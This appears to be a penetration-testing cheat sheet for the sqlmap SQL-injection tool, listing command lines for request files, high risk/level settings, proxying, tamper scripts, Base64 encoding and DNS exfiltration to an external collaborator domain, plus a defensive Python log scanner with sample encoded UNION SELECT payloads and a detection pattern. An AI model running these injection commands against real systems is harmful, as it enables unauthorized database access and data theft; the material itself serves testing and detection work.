SQLmap

Automate SQL Injections

Documentation

https://github.com/sqlmapproject/sqlmap/wiki/Usage

From Request - HTTP:80

sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080

From Request - HTTPS:443

sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080

Alternatively, the http.request file can carry the port in its Host header (Host: server:443).

Batch Silent Mode without questions

sqlmap -r http.request --force-ssl --answers="follow=Y" --batch

DNS Collaborator (under root)

Tip: register a second HTTP proxy listener on port 8081 and send all sqlmap probes through it, so the proxy history can be filtered by the listener that received sqlmap's traffic.

Use the --dns-domain switch to instruct sqlmap to use DNS probes against your collaborator server.

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5

Tampering

Tamper scripts transform or encode the payload before it is sent; select them with the --tamper switch.

sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode"

A list of all existing tamper scripts is available via the --list-tampers switch or by looking at the /tamper folder of the GitHub repository.

URL target & Parameters

sqlmap -u http://domain?id=1 -p id

You can read the HTTP request from a file and mark the injection point with an asterisk (*).

sqlmap -r ./sql.req

# sql.req is a file containing the raw HTTP request, with an asterisk (*) marking the parameter to inject into
GET /path/to/username*
Host: servername:port

HTTP Proxy

sqlmap --proxy=http://127.0.0.1:8080

Databases

Values for the most common DBMSs; for the remaining ones, see the sqlmap wiki entry for --dbms.

--dbms=mssql|mysql|postgresql|oracle

Base64 Encoding

By default sqlmap URL-encodes values in the query string. When the payload needs to be Base64 encoded instead, pass the parameter name to the following switch.

sqlmap -u domain?p1=value --base64=p1
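The charencode tamper in the Tampering section and the --base64 switch above both change how a payload looks on the wire, which is exactly what defeats a naive keyword search over web server logs. The following Python example is added to these notes; it is not part of sqlmap or of the original page. It shows a small normalizer for access-log query strings: it percent-decodes repeatedly and attempts a Base64 decode before matching, so a signature that misses the raw value catches the decoded one. The log lines, the parameter names (id, p1) and the host are constructed, and the keyword list is a deliberately tiny illustration, not a production ruleset.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page). The second
# line carries a charencode-style value (every character percent-encoded), the
# third a Base64-encoded parameter; the first is a benign request.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item?p1=MSBVTklPTiBTRUxFQ1QgMSwy HTTP/1.1" 200 512',
]

# Deliberately small illustrative signature list; a real ruleset is far larger.
SQLI_KEYWORDS = re.compile(r"union\s+select|sleep\s*\(|\bor\s+\d+\s*=\s*\d+", re.I)


def url_decode_fully(value, max_rounds=5):
    """Percent-decode until the value stops changing (handles double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def try_base64(value):
    """Return the decoded text if value is well-formed Base64 that decodes to
    printable ASCII, otherwise None. Short or non-alphabet values are skipped."""
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def parse_query(log_line):
    """Extract {param: raw_value} from the request target in a combined-log line."""
    m = re.search(r'"(?:GET|POST|PUT|DELETE)\s+\S*\?(\S+)\s+HTTP/', log_line)
    if not m:
        return {}
    params = {}
    for pair in m.group(1).split("&"):
        key, _, val = pair.partition("=")
        params[key] = val
    return params


def normalize(value):
    """Return the raw value plus every decoded form worth matching against."""
    candidates = [value]
    decoded = url_decode_fully(value)
    candidates.append(decoded)
    b64 = try_base64(decoded)
    if b64 is not None:
        candidates.append(url_decode_fully(b64))
    return candidates


def naive_match(value):
    """Signature match on the raw value only, as a naive log search would do."""
    return bool(SQLI_KEYWORDS.search(value))


def normalized_match(value):
    """Signature match after reversing percent and Base64 encoding."""
    return any(SQLI_KEYWORDS.search(c) for c in normalize(value))


def scan_log(lines):
    """Return (param, raw_value, naive_hit, normalized_hit) per query parameter."""
    results = []
    for line in lines:
        for param, raw in parse_query(line).items():
            results.append((param, raw, naive_match(raw), normalized_match(raw)))
    return results


if __name__ == "__main__":
    for param, raw, naive, normalized in scan_log(SAMPLE_LOG_LINES):
        print(f"{param}={raw[:40]:<40} naive={naive!s:<5} normalized={normalized}")
```

Only the normalized pass flags the second and third lines; the raw-value match sees nothing in either. The same decoding order (percent first, then Base64) is what a WAF or log pipeline has to apply before any keyword rule is meaningful.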

HTTP method - DELETE

sqlmap --method=DELETE -u http://domain -p param1
